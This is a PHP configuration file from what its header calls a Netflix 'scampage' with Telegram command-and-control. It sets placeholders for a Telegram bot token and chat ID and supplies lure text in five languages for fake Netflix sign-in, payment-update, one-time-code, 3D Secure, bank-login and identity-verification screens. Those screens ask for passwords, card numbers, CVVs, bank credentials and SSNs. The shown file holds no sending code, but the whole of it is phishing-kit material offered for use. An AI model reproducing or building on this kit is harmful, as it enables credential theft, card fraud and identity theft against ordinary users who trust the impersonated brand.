<?php
// ═══════════════════════════════════════════
// NETFLIX SCAMPAGE 2026 - TELEGRAM C2
// ═══════════════════════════════════════════

// Telegram Configuration
define('BOT_TOKEN', 'YOUR_BOT_TOKEN_HERE');
define('CHAT_ID', 'YOUR_CHAT_ID_HERE');

// Security
define('SECRET_KEY', 'nf_' . bin2hex(random_bytes(8)));

// Language Support
$langs = [
    'en' => 'English',
    'fr' => 'Français', 
    'ar' => 'العربية',
    'es' => 'Español',
    'de' => 'Deutsch'
];

function getLang() {
    return isset($_GET['lang']) && array_key_exists($_GET['lang'], $GLOBALS['langs']) 
        ? $_GET['lang'] 
        : 'en';
}

function t($key, $lang = null) {
    $lang = $lang ?: getLang();
    $texts = [
        'en' => [
            'signin' => 'Sign In',
            'email' => 'Email or phone number',
            'password' => 'Password',
            'remember' => 'Remember me',
            'help' => 'Need help?',
            'new' => 'New to Netflix?',
            'signup' => 'Sign up now',
            'payment' => 'Update Payment Information',
            'on_hold' => 'Your account is on hold.',
            'payment_issue' => 'We encountered an issue with your current payment method. Please update your billing information to continue watching.',
            'name_card' => 'Name on card',
            'card_number' => 'Card number',
            'expiry' => 'MM/YY',
            'cvv' => 'CVV',
            'zip' => 'Billing ZIP code',
            'secure' => 'Secure 128-bit SSL encrypted',
            'update' => 'Update Payment',
            'verify' => 'Verify Your Identity',
            'verify_sub' => 'For your security, we need to verify this account.',
            'code_sent' => 'A code has been sent to your mobile device.',
            'expires' => 'Code expires in',
            'resend' => 'Resend code',
            'verify_btn' => 'Verify',
            'approval' => '3D Secure Authentication',
            'approval_sub' => 'Your bank requires additional verification.',
            'approval_text' => 'Please approve this transaction in your banking app or enter the code sent by your bank.',
            'bank_code' => 'Bank Authentication Code',
            'bank_login' => 'Bank Login Required',
            'bank_sub' => 'Please log in to your bank to authorize this payment.',
            'bank_user' => 'Username / Customer ID',
            'bank_pass' => 'Password',
            'kyc' => 'Identity Verification',
            'kyc_sub' => 'Please confirm your identity to continue using Netflix.',
            'full_name' => 'Full Name',
            'dob' => 'Date of Birth',
            'address' => 'Address',
            'city' => 'City',
            'phone' => 'Phone Number',
            'ssn' => 'SSN / National ID',
            'submit' => 'Submit',
            'continue' => 'Continue',
            'processing' => 'Processing...',
            'success' => 'Verification Complete',
            'success_sub' => 'Your account has been restored. Redirecting to Netflix...'
        ],
        'fr' => [
            'signin' => 'Connexion',
            'email' => 'E-mail ou numéro de téléphone',
            'password' => 'Mot de passe',
            'remember' => 'Se souvenir de moi',
            'help' => 'Besoin d'aide?',
            'new' => 'Nouveau sur Netflix?',
            'signup' => 'Inscrivez-vous maintenant',
            'payment' => 'Mettre à jour le paiement',
            'on_hold' => 'Votre compte est suspendu.',
            'payment_issue' => 'Nous avons rencontré un problème avec votre mode de paiement. Veuillez mettre à jour vos informations de facturation pour continuer.',
            'name_card' => 'Nom sur la carte',
            'card_number' => 'Numéro de carte',
            'expiry' => 'MM/AA',
            'cvv' => 'CVV',
            'zip' => 'Code postal',
            'secure' => 'Cryptage SSL 128 bits sécurisé',
            'update' => 'Mettre à jour',
            'verify' => 'Vérifiez votre identité',
            'verify_sub' => 'Pour votre sécurité, nous devons vérifier ce compte.',
            'code_sent' => 'Un code a été envoyé sur votre mobile.',
            'expires' => 'Le code expire dans',
            'resend' => 'Renvoyer le code',
            'verify_btn' => 'Vérifier',
            'approval' => 'Authentification 3D Secure',
            'approval_sub' => 'Votre banque nécessite une vérification supplémentaire.',
            'approval_text' => 'Veuillez approuver cette transaction dans votre application bancaire ou entrer le code envoyé par votre banque.',
            'bank_code' => 'Code d'authentification bancaire',
            'bank_login' => 'Connexion bancaire requise',
            'bank_sub' => 'Connectez-vous à votre banque pour autoriser ce paiement.',
            'bank_user' => 'Identifiant client',
            'bank_pass' => 'Mot de passe',
            'kyc' => 'Vérification d'identité',
            'kyc_sub' => 'Confirmez votre identité pour continuer à utiliser Netflix.',
            'full_name' => 'Nom complet',
            'dob' => 'Date de naissance',
            'address' => 'Adresse',
            'city' => 'Ville',
            'phone' => 'Téléphone',
            'ssn' => 'Numéro de sécurité sociale',
            'submit' => 'Soumettre',
            'continue' => 'Continuer',
            'processing' => 'Traitement...',
            'success' => 'Vérification terminée',
            'success_sub' => 'Votre compte est restauré. Redirection vers Netflix...'
        ],
        'ar' => [
            'signin' => 'تسجيل الدخول',
            'email' => 'البريد الإلكتروني أو رقم الهاتف',
            'password' => 'كلمة المرور',
            'remember' => 'تذكرني',
            'help' => 'هل تحتاج مساعدة؟',
            'new' => 'جديد على نتفليكس؟',
            'signup' => 'سجّل الآن',
            'payment' => 'تحديث معلومات الدفع',
            'on_hold' => 'حسابك معلّق.',
            'payment_issue' => 'واجهنا مشكلة في طريقة الدفع الحالية. يرجى تحديث معلومات الفوترة للمتابعة.',
            'name_card' => 'الاسم على البطاقة',
            'card_number' => 'رقم البطاقة',
            'expiry' => 'شهر/سنة',
            'cvv' => 'رمز الأمان',
            'zip' => 'الرمز البريدي',
            'secure' => 'تشفير SSL 128-bit آمن',
            'update' => 'تحديث الدفع',
            'verify' => 'التحقق من هويتك',
            'verify_sub' => 'لأمانك، نحتاج التحقق من هذا الحساب.',
            'code_sent' => 'تم إرسال رمز إلى هاتفك.',
            'expires' => 'الرمز ينتهي خلال',
            'resend' => 'إعادة إرسال',
            'verify_btn' => 'تحقق',
            'approval' => 'مصادقة 3D Secure',
            'approval_sub' => 'بنكك يتطلب تحقق إضافي.',
            'approval_text' => 'يرجى الموافقة على هذه العملية في تطبيق البنك أو إدخال الرمز المرسل من البنك.',
            'bank_code' => 'رمز مصادقة البنك',
            'bank_login' => 'تسجيل دخول البنك مطلوب',
            'bank_sub' => 'سجّل الدخول إلى بنكك للسماح بالدفع.',
            'bank_user' => 'اسم المستخدم / رقم العميل',
            'bank_pass' => 'كلمة المرور',
            'kyc' => 'التحقق من الهوية',
            'kyc_sub' => 'أكّد هويتك للاستمرار في نتفليكس.',
            'full_name' => 'الاسم الكامل',
            'dob' => 'تاريخ الميلاد',
            'address' => 'العنوان',
            'city' => 'المدينة',
            'phone' => 'رقم الهاتف',
            'ssn' => 'رقم الهوية / الضمان الاجتماعي',
            'submit' => 'إرسال',
            'continue' => 'متابعة',
            'processing' => 'جاري المعالجة...',
            'success' => 'اكتمل التحقق',
            'success_sub' => 'تم استعادة حسابك. جاري التحويل إلى نتفليكس...'
        ],
        'es' => [
            'signin' => 'Iniciar sesión',
            'email' => 'Correo o número de teléfono',
            'password' => 'Contraseña',
            'remember' => 'Recuérdame',
            'help' => '¿Necesitas ayuda?',
            'new' => '¿Nuevo en Netflix?',
            'signup' => 'Regístrate ahora',
            'payment' => 'Actualizar pago',
            'on_hold' => 'Tu cuenta está suspendida.',
            'payment_issue' => 'Tuvimos un problema con tu método de pago. Actualiza tu información de facturación para continuar.',
            'name_card' => 'Nombre en la tarjeta',
            'card_number' => 'Número de tarjeta',
            'expiry' => 'MM/AA',
            'cvv' => 'CVV',
            'zip' => 'Código postal',
            'secure' => 'Encriptación SSL 128-bit segura',
            'update' => 'Actualizar',
            'verify' => 'Verifica tu identidad',
            'verify_sub' => 'Por seguridad, necesitamos verificar esta cuenta.',
            'code_sent' => 'Se envió un código a tu móvil.',
            'expires' => 'El código expira en',
            'resend' => 'Reenviar código',
            'verify_btn' => 'Verificar',
            'approval' => 'Autenticación 3D Secure',
            'approval_sub' => 'Tu banco requiere verificación adicional.',
            'approval_text' => 'Aprueba esta transacción en tu app bancaria o ingresa el código enviado por tu banco.',
            'bank_code' => 'Código de autenticación bancaria',
            'bank_login' => 'Inicio de sesión bancario requerido',
            'bank_sub' => 'Inicia sesión en tu banco para autorizar el pago.',
            'bank_user' => 'Usuario / ID de cliente',
            'bank_pass' => 'Contraseña',
            'kyc' => 'Verificación de identidad',
            'kyc_sub' => 'Confirma tu identidad para continuar en Netflix.',
            'full_name' => 'Nombre completo',
            'dob' => 'Fecha de nacimiento',
            'address' => 'Dirección',
            'city' => 'Ciudad',
            'phone' => 'Teléfono',
            'ssn' => 'NSS / ID Nacional',
            'submit' => 'Enviar',
            'continue' => 'Continuar',
            'processing' => 'Procesando...',
            'success' => 'Verificación completada',
            'success_sub' => 'Tu cuenta ha sido restaurada. Redirigiendo a Netflix...'
        ],
        'de' => [
            'signin' => 'Einloggen',
            'email' => 'E-Mail oder Telefonnummer',
            'password' => 'Passwort',
            'remember' => 'Angemeldet bleiben',
            'help' => 'Hilfe?',
            'new' => 'Neu bei Netflix?',
            'signup' => 'Jetzt registrieren',
            'payment' => 'Zahlung aktualisieren',
            'on_hold' => 'Ihr Konto ist gesperrt.',
            'payment_issue' => 'Problem mit Ihrer Zahlungsmethode. Bitte aktualisieren Sie Ihre Rechnungsinformationen.',
            'name_card' => 'Name auf Karte',
            'card_number' => 'Kartennummer',
            'expiry' => 'MM/JJ',
            'cvv' => 'CVV',
            'zip' => 'Postleitzahl',
            'secure' => 'Sichere 128-bit SSL-Verschlüsselung',
            'update' => 'Aktualisieren',
            'verify' => 'Identität verifizieren',
            'verify_sub' => 'Zu Ihrer Sicherheit müssen wir dieses Konto verifizieren.',
            'code_sent' => 'Ein Code wurde an Ihr Handy gesendet.',
            'expires' => 'Code läuft ab in',
            'resend' => 'Code erneut senden',
            'verify_btn' => 'Verifizieren',
            'approval' => '3D Secure Authentifizierung',
            'approval_sub' => 'Ihre Bank erfordert zusätzliche Verifizierung.',
            'approval_text' => 'Bitte genehmigen Sie diese Transaktion in Ihrer Banking-App oder geben Sie den Code ein.',
            'bank_code' => 'Bank-Authentifizierungscode',
            'bank_login' => 'Bank-Login erforderlich',
            'bank_sub' => 'Bitte loggen Sie sich in Ihre Bank ein, um die Zahlung zu autorisieren.',
            'bank_user' => 'Benutzername / Kunden-ID',
            'bank_pass' => 'Passwort',
            'kyc' => 'Identitätsprüfung',
            'kyc_sub' => 'Bitte bestätigen Sie Ihre Identität, um Netflix weiter zu nutzen.',
            'full_name' => 'Vollständiger Name',
            'dob' => 'Geburtsdatum',
            'address' => 'Adresse',
            'city' => 'Stadt',
            'phone' => 'Telefonnummer',
            'ssn' => 'Sozialversicherungsnummer',
            'submit' => 'Absenden',
            'continue' => 'Weiter',
            'processing' => 'Verarbeitung...',
            'success' => 'Verifizierung abgeschlossen',
            'success_sub' => 'Ihr Konto wurde wiederhergestellt. Weiterleitung zu Netflix...'
        ]
    ];
    return $texts[$lang][$key] ?? $texts['en'][$key];
}
?>
